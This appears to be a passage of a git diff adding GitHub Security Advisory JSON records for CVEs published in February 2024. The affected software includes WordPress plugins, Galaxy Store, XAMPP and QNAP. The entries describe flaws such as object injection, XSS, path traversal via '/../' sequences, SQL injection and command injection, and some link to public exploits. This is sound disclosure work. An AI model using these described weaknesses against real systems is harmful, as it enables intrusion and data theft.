newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-fvvm-3cr2-6qx2/GHSA-fvvm-3cr2-6qx2.json b/advisories/unreviewed/2024/02/GHSA-fvvm-3cr2-6qx2/GHSA-fvvm-3cr2-6qx2.json new file mode 100644 index 0000000000000..10239adc2f01e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-fvvm-3cr2-6qx2/GHSA-fvvm-3cr2-6qx2.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fvvm-3cr2-6qx2", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0668" + ], + "details": "The Advanced Database Cleaner plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.1.3 via deserialization of untrusted input in the 'process_bulk_action' function. This makes it possible for authenticated attacker, with administrator access and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0668" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/advanced-database-cleaner/tags/3.1.3/includes/class_clean_cron.php#L224" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/advanced-database-cleaner/tags/3.1.3/includes/class_clean_cron.php#L298" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3025980/" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e0b8c24b-3e51-4637-9d8e-da065077d082?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-fwm6-ghvh-8mr4/GHSA-fwm6-ghvh-8mr4.json b/advisories/unreviewed/2024/02/GHSA-fwm6-ghvh-8mr4/GHSA-fwm6-ghvh-8mr4.json new file mode 100644 index 0000000000000..037a375e4024c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-fwm6-ghvh-8mr4/GHSA-fwm6-ghvh-8mr4.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fwm6-ghvh-8mr4", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0859" + ], + "details": "The Affiliates Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.9.34. This is due to missing or incorrect nonce validation on the process_bulk_action function in ListAffiliatesTable.php. This makes it possible for unauthenticated attackers to delete affiliates via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0859" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/affiliates-manager/trunk/classes/ListAffiliatesTable.php" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3028484/affiliates-manager/trunk?contextall=1&old=3015278&old_path=%2Faffiliates-manager%2Ftrunk" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/433a03c2-09fd-4ce6-843b-55ad09f4b4f7?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-fwwv-x7hh-wmpw/GHSA-fwwv-x7hh-wmpw.json b/advisories/unreviewed/2024/02/GHSA-fwwv-x7hh-wmpw/GHSA-fwwv-x7hh-wmpw.json new file mode 100644 index 0000000000000..e494fcdd01d97 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-fwwv-x7hh-wmpw/GHSA-fwwv-x7hh-wmpw.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fwwv-x7hh-wmpw", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2024-20825" + ], + "details": "Implicit intent hijacking vulnerability in IAP of Galaxy Store prior to version 4.5.63.6 allows local attackers to access sensitive information via implicit intent.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20825" + }, + { + "type": "WEB", + "url": "https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T03:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-fx38-3h42-mwm8/GHSA-fx38-3h42-mwm8.json b/advisories/unreviewed/2024/02/GHSA-fx38-3h42-mwm8/GHSA-fx38-3h42-mwm8.json new file mode 100644 index 0000000000000..2197892e0b9c3 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-fx38-3h42-mwm8/GHSA-fx38-3h42-mwm8.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fx38-3h42-mwm8", + "modified": "2024-02-02T06:30:31Z", + "published": "2024-02-02T06:30:31Z", + "aliases": [ + "CVE-2023-38019" + ], + "details": "IBM SOAR QRadar Plugin App 1.0 through 5.0.3 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing \"dot dot\" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 260575.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38019" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/260575" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7111679" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T04:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-fxcj-mv3v-84c5/GHSA-fxcj-mv3v-84c5.json b/advisories/unreviewed/2024/02/GHSA-fxcj-mv3v-84c5/GHSA-fxcj-mv3v-84c5.json new file mode 100644 index 0000000000000..0f0aa3dd20ec1 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-fxcj-mv3v-84c5/GHSA-fxcj-mv3v-84c5.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fxcj-mv3v-84c5", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-1208" + ], + "details": "The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1208" + }, + { + "type": "WEB", + "url": "https://github.com/karlemilnikka/CVE-2024-1208-and-CVE-2024-1210" + }, + { + "type": "WEB", + "url": "https://www.learndash.com/release-notes/" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ae735117-e68b-448e-ad41-258d1be3aebc?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-g29c-f862-592m/GHSA-g29c-f862-592m.json b/advisories/unreviewed/2024/02/GHSA-g29c-f862-592m/GHSA-g29c-f862-592m.json new file mode 100644 index 0000000000000..b3299c109a902 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-g29c-f862-592m/GHSA-g29c-f862-592m.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g29c-f862-592m", + "modified": "2024-02-02T09:30:22Z", + "published": "2024-02-02T09:30:22Z", + "aliases": [ + "CVE-2020-24682" + ], + "details": "Unquoted Search Path or Element vulnerability in B&R Industrial Automation Automation Studio, B&R Industrial Automation NET/PVI allows Target Programs with Elevated Privileges.This issue affects Automation Studio: from 4.6.0 through 4.6.X, from 4.7.0 before 4.7.7 SP, from 4.8.0 before 4.8.6 SP, from 4.9.0 before 4.9.4 SP; NET/PVI: from 4.6.0 through 4.6.X, from 4.7.0 before 4.7.7, from 4.8.0 before 4.8.6, from 4.9.0 before 4.9.4.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-24682" + }, + { + "type": "WEB", + "url": "https://www.br-automation.com/fileadmin/2021-14-BR-AS-NET-PVI-Service-Issues-c3710fbf.pdf" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-428" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T08:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-g39f-q9cx-h4c7/GHSA-g39f-q9cx-h4c7.json b/advisories/unreviewed/2024/02/GHSA-g39f-q9cx-h4c7/GHSA-g39f-q9cx-h4c7.json new file mode 100644 index 0000000000000..602cd8bcb1f32 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-g39f-q9cx-h4c7/GHSA-g39f-q9cx-h4c7.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g39f-q9cx-h4c7", + "modified": "2024-02-08T18:30:39Z", + "published": "2024-02-08T18:30:39Z", + "aliases": [ + "CVE-2024-25191" + ], + "details": "php-jwt 1.0.0 uses strcmp (which is not constant time) to verify authentication, which makes it easier to bypass authentication via a timing side channel.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25191" + }, + { + "type": "WEB", + "url": "https://github.com/P3ngu1nW/CVE_Request/blob/main/cdoco%3Aphp-jwt.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T17:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-g39j-hgm2-fxmh/GHSA-g39j-hgm2-fxmh.json b/advisories/unreviewed/2024/02/GHSA-g39j-hgm2-fxmh/GHSA-g39j-hgm2-fxmh.json new file mode 100644 index 0000000000000..0ebdf4642eba6 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-g39j-hgm2-fxmh/GHSA-g39j-hgm2-fxmh.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g39j-hgm2-fxmh", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2024-20822" + ], + "details": "Implicit intent hijacking vulnerability in AccountActivity of Galaxy Store prior to version 4.5.63.6 allows local attackers to access sensitive information via implicit intent.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20822" + }, + { + "type": "WEB", + "url": "https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T03:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-g3q6-pqr4-w43v/GHSA-g3q6-pqr4-w43v.json b/advisories/unreviewed/2024/02/GHSA-g3q6-pqr4-w43v/GHSA-g3q6-pqr4-w43v.json new file mode 100644 index 0000000000000..1fd0d1eb389f7 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-g3q6-pqr4-w43v/GHSA-g3q6-pqr4-w43v.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g3q6-pqr4-w43v", + "modified": "2024-02-02T12:30:30Z", + "published": "2024-02-02T12:30:30Z", + "aliases": [ + "CVE-2024-0338" + ], + "details": "A buffer overflow vulnerability has been found in XAMPP affecting version 8.2.4 and earlier. An attacker could execute arbitrary code through a long file debug argument that controls the Structured Exception Handler (SEH).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0338" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/buffer-overflow-vulnerability-xampp" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T10:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-g3v7-59j8-gvqc/GHSA-g3v7-59j8-gvqc.json b/advisories/unreviewed/2024/02/GHSA-g3v7-59j8-gvqc/GHSA-g3v7-59j8-gvqc.json new file mode 100644 index 0000000000000..b42dde4b16c37 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-g3v7-59j8-gvqc/GHSA-g3v7-59j8-gvqc.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g3v7-59j8-gvqc", + "modified": "2024-02-01T12:30:22Z", + "published": "2024-02-01T12:30:22Z", + "aliases": [ + "CVE-2023-52195" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Posts to Page Kerry James allows Stored XSS.This issue affects Kerry James: from n/a through 1.7.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52195" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/posts-to-page/wordpress-posts-to-page-plugin-1-7-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T10:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-g43c-2v38-6gm9/GHSA-g43c-2v38-6gm9.json b/advisories/unreviewed/2024/02/GHSA-g43c-2v38-6gm9/GHSA-g43c-2v38-6gm9.json new file mode 100644 index 0000000000000..8c8d9bae58430 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-g43c-2v38-6gm9/GHSA-g43c-2v38-6gm9.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g43c-2v38-6gm9", + "modified": "2024-02-07T18:30:26Z", + "published": "2024-02-01T21:30:31Z", + "aliases": [ + "CVE-2024-24945" + ], + "details": "A stored cross-site scripting (XSS) vulnerability in Travel Journal Using PHP and MySQL with Source Code v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Share Your Moments parameter at /travel-journal/write-journal.php.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24945" + }, + { + "type": "WEB", + "url": "https://github.com/tubakvgc/CVE/blob/main/Travel_Journal_App.md" + }, + { + "type": "WEB", + "url": "https://portswigger.net/web-security/cross-site-scripting" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T20:50:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-g56c-cwv7-vvrx/GHSA-g56c-cwv7-vvrx.json b/advisories/unreviewed/2024/02/GHSA-g56c-cwv7-vvrx/GHSA-g56c-cwv7-vvrx.json new file mode 100644 index 0000000000000..11c3610c8be3c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-g56c-cwv7-vvrx/GHSA-g56c-cwv7-vvrx.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g56c-cwv7-vvrx", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-1177" + ], + "details": "The WP Club Manager – WordPress Sports Club Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the settings_save() function in all versions up to, and including, 2.2.10. This makes it possible for unauthenticated attackers to update the permalink structure for the clubs", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1177" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030843%40wp-club-manager&new=3030843%40wp-club-manager&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/64c2c8c2-58f5-4b7d-b226-39ba39e887d5?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-g57h-wh27-8fc4/GHSA-g57h-wh27-8fc4.json b/advisories/unreviewed/2024/02/GHSA-g57h-wh27-8fc4/GHSA-g57h-wh27-8fc4.json new file mode 100644 index 0000000000000..63fea1a7f0e6c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-g57h-wh27-8fc4/GHSA-g57h-wh27-8fc4.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g57h-wh27-8fc4", + "modified": "2024-02-02T18:30:32Z", + "published": "2024-02-02T18:30:32Z", + "aliases": [ + "CVE-2024-1186" + ], + "details": "A vulnerability classified as problematic was found in Munsoft Easy Archive Recovery 2.0. This vulnerability affects unknown code of the component Registration Key Handler. The manipulation leads to denial of service. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252676. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1186" + }, + { + "type": "WEB", + "url": "https://fitoxs.com/vuldb/12-exploit-perl.txt" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252676" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252676" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/45884" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-404" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T17:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-g5p5-rhqv-c3qj/GHSA-g5p5-rhqv-c3qj.json b/advisories/unreviewed/2024/02/GHSA-g5p5-rhqv-c3qj/GHSA-g5p5-rhqv-c3qj.json new file mode 100644 index 0000000000000..3aab71a206642 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-g5p5-rhqv-c3qj/GHSA-g5p5-rhqv-c3qj.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g5p5-rhqv-c3qj", + "modified": "2024-02-03T06:30:24Z", + "published": "2024-02-03T06:30:24Z", + "aliases": [ + "CVE-2023-37528" + ], + "details": "A cross-site scripting (XSS) vulnerability in the Web Reports component of HCL BigFix Platform can possibly allow an attack to exploit an application parameter during execution of the Save Report. \n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37528" + }, + { + "type": "WEB", + "url": "https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0110209" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-03T06:15:46Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-g6mc-rm4g-xf26/GHSA-g6mc-rm4g-xf26.json b/advisories/unreviewed/2024/02/GHSA-g6mc-rm4g-xf26/GHSA-g6mc-rm4g-xf26.json new file mode 100644 index 0000000000000..6c82f54d6b54b --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-g6mc-rm4g-xf26/GHSA-g6mc-rm4g-xf26.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g6mc-rm4g-xf26", + "modified": "2024-02-05T09:30:28Z", + "published": "2024-02-05T09:30:28Z", + "aliases": [ + "CVE-2024-24847" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in jgadbois CalculatorPro Calculators allows Reflected XSS.This issue affects CalculatorPro Calculators: from n/a through 1.1.7.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24847" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/calculatorpro-calculators/wordpress-calculatorpro-calculators-plugin-1-1-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T07:15:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-g7hf-vv6m-6f8q/GHSA-g7hf-vv6m-6f8q.json b/advisories/unreviewed/2024/02/GHSA-g7hf-vv6m-6f8q/GHSA-g7hf-vv6m-6f8q.json new file mode 100644 index 0000000000000..2cf27aff1f52e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-g7hf-vv6m-6f8q/GHSA-g7hf-vv6m-6f8q.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g7hf-vv6m-6f8q", + "modified": "2024-02-02T18:30:30Z", + "published": "2024-02-02T18:30:30Z", + "aliases": [ + "CVE-2023-39302" + ], + "details": "An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute commands via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.3.2578 build 20231110 and later\nQuTS hero h5.1.3.2578 build 20231110 and later\nQuTScloud c5.1.5.2651 and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39302" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-23-33" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-g7q9-f2h9-c7v7/GHSA-g7q9-f2h9-c7v7.json b/advisories/unreviewed/2024/02/GHSA-g7q9-f2h9-c7v7/GHSA-g7q9-f2h9-c7v7.json new file mode 100644 index 0000000000000..cfea605716897 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-g7q9-f2h9-c7v7/GHSA-g7q9-f2h9-c7v7.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g7q9-f2h9-c7v7", + "modified": "2024-02-08T03:32:45Z", + "published": "2024-02-08T03:32:45Z", + "aliases": [ + "CVE-2024-24023" + ], + "details": "A SQL injection vulnerability exists in Novel-Plus v4.3.0-RC1 and prior. An attacker can pass specially crafted offset, limit, and sort parameters to perform SQL injection via /novel/bookContent/list.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24023" + }, + { + "type": "WEB", + "url": "https://github.com/201206030/novel-plus" + }, + { + "type": "WEB", + "url": "https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24023.txt" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T01:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-g7rx-4mww-c3pc/GHSA-g7rx-4mww-c3pc.json b/advisories/unreviewed/2024/02/GHSA-g7rx-4mww-c3pc/GHSA-g7rx-4mww-c3pc.json new file mode 100644 index 0000000000000..0f713eee7dd33 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-g7rx-4mww-c3pc/GHSA-g7rx-4mww-c3pc.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g7rx-4mww-c3pc", + "modified": "2024-02-06T00:30:26Z", + "published": "2024-02-06T00:30:26Z", + "aliases": [ + "CVE-2023-6996" + ], + "details": "The Display custom fields in the frontend – Post and User Profile Fields plugin for WordPress is vulnerable to Code Injection via the plugin's vg_display_data shortcode in all versions up to, and including, 1.2.1 due to insufficient input validation and restriction on access to that shortcode. This makes it possible for authenticated attackers with contributor-level and above permissions to call arbitrary functions and execute code.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6996" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3021133%40shortcode-to-display-post-and-user-data&new=3021133%40shortcode-to-display-post-and-user-data&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e0662c3a-5b82-4b9a-aa69-147094930d1f?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-g82w-9p8c-7g8q/GHSA-g82w-9p8c-7g8q.json b/advisories/unreviewed/2024/02/GHSA-g82w-9p8c-7g8q/GHSA-g82w-9p8c-7g8q.json new file mode 100644 index 0000000000000..143a77b3abff6 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-g82w-9p8c-7g8q/GHSA-g82w-9p8c-7g8q.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g82w-9p8c-7g8q", + "modified": "2024-02-01T12:30:23Z", + "published": "2024-02-01T12:30:23Z", + "aliases": [ + "CVE-2023-51514" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Codeboxr Team CBX Bookmark & Favorite allows Stored XSS.This issue affects CBX Bookmark & Favorite: from n/a through 1.7.13.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": 